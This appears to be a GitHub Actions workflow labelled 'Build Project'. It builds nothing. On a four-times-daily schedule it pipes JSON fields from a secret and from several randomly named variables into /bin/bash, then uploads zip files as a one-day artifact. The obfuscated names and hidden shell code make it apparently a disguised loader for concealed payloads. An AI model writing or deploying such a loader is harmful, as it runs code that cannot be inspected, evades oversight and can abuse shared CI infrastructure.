name: Build Project
on:
  workflow_dispatch:

  schedule:
    - cron: '52 5,11,17,23 * * *'
permissions:
  contents: read
concurrency:
  group: ${{ github.workflow }}-${{ github.ref }}
  cancel-in-progress: true
jobs:
  trigger:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v4
      - name: Start
        env:
          ytbi805: ${{ secrets.ytbi805 }}
        run: |
          printf '%s' "$ytbi805" | jq -r .wnhpn267 | /bin/bash
          printf '%s' "$hhv94502" | jq -r .g97 | /bin/bash
          printf '%s' "$lup8" | jq -r .ll31 | /bin/bash
          printf '%s' "$rufe0" | jq -r .y90968 | /bin/bash
          echo $xdiz808 | jq -r .yz93 | /bin/bash
          printf '%s' "$rybz6" | jq -r .xre1269 | /bin/bash
          printf '%s' "$dxizj4935" | jq -r .l74 | /bin/bash

      - name: Save output
        uses: actions/upload-artifact@v4
        with:
          name: gYo5iTLE
          path: "*.zip"
          retention-days: 1
